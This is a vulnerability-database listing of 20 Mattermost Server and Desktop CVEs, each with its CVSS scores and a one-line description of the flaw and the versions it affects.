Vulnerabilities (CVE)

Join the Common Vulnerabilities and Exposures (CVE) community and start to get notified about new vulnerabilities.

Filtered by vendor Mattermost Subscribe
Total 194 CVE
CVE Vendors Products Updated CVSS v2 CVSS v3
CVE-2017-18882 1 Mattermost 1 Mattermost Server 2020-06-26 4.3 MEDIUM 6.1 MEDIUM
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. XSS can occur via OpenGraph data.
CVE-2019-20863 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 7.5 HIGH
An issue was discovered in Mattermost Server before 5.13.0. Incoming webhook creation is not properly restricted.
CVE-2017-18881 1 Mattermost 1 Mattermost Server 2020-06-26 4.3 MEDIUM 6.1 MEDIUM
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. XSS could occur via a goto_location response to a slash command.
CVE-2017-18887 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. It discloses the team creator's e-mail address to members.
CVE-2017-18888 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 4.3.0, 4.2.1, and 4.1.2. It allows SQL injection during the fetching of multiple posts.
CVE-2019-20861 1 Mattermost 1 Mattermost Desktop 2020-06-26 6.8 MEDIUM 8.8 HIGH
An issue was discovered in Mattermost Desktop App before 4.2.2. It allows attackers to execute arbitrary code via a crafted link.
CVE-2017-18897 1 Mattermost 1 Mattermost Server 2020-06-26 5.8 MEDIUM 6.1 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5, when used as an OAuth 2.0 service provider. It mishandles a deny action for a redirection.
CVE-2017-18898 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5. It allows crafted posts that potentially cause a web browser to hang.
CVE-2017-18871 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 7.5 HIGH
An issue was discovered in Mattermost Server before 4.5.0, 4.4.5, 4.3.4, and 4.2.2. It allows attackers to cause a denial of service (application crash) via an @ character before a JavaScript field name.
CVE-2016-11064 1 Mattermost 1 Mattermost Desktop 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Desktop App before 3.4.0. Strings could be executed as code via injection.
CVE-2016-11069 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 7.5 HIGH
An issue was discovered in Mattermost Server before 3.2.0. It mishandles brute-force attempts at password change.
CVE-2016-11065 1 Mattermost 1 Mattermost Server 2020-06-26 4.0 MEDIUM 4.3 MEDIUM
An issue was discovered in Mattermost Server before 3.3.0. An attacker could use the WebSocket feature to send pop-up messages to users or change a post's appearance.
CVE-2016-11062 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 3.5.1. E-mail address verification can be bypassed.
CVE-2016-11072 1 Mattermost 1 Mattermost Server 2020-06-26 6.4 MEDIUM 6.5 MEDIUM
An issue was discovered in Mattermost Server before 3.0.2. The purposes of a session ID and a Session Token were mishandled.
CVE-2016-11074 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 3.0.0. A password-reset link could be reused.
CVE-2017-18912 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 3.8.2, 3.7.5, and 3.6.7. It allows an attacker to specify a full pathname of a log file.
CVE-2017-18901 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.1.0, 4.0.4, and 3.10.3. It allows attackers to discover a team invite ID by requesting a JSON document.
CVE-2017-18900 1 Mattermost 1 Mattermost Server 2020-06-26 7.5 HIGH 9.8 CRITICAL
An issue was discovered in Mattermost Server before 4.1.0, 4.0.4, and 3.10.3. It allows CSV injection via a compliance report.
CVE-2017-18899 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5. It mishandles IP-based rate limiting.
CVE-2017-18896 1 Mattermost 1 Mattermost Server 2020-06-26 5.0 MEDIUM 5.3 MEDIUM
An issue was discovered in Mattermost Server before 4.2.0, 4.1.1, and 4.0.5. It allows attackers to add DEBUG lines to the logs via a REST API version 3 logging endpoint.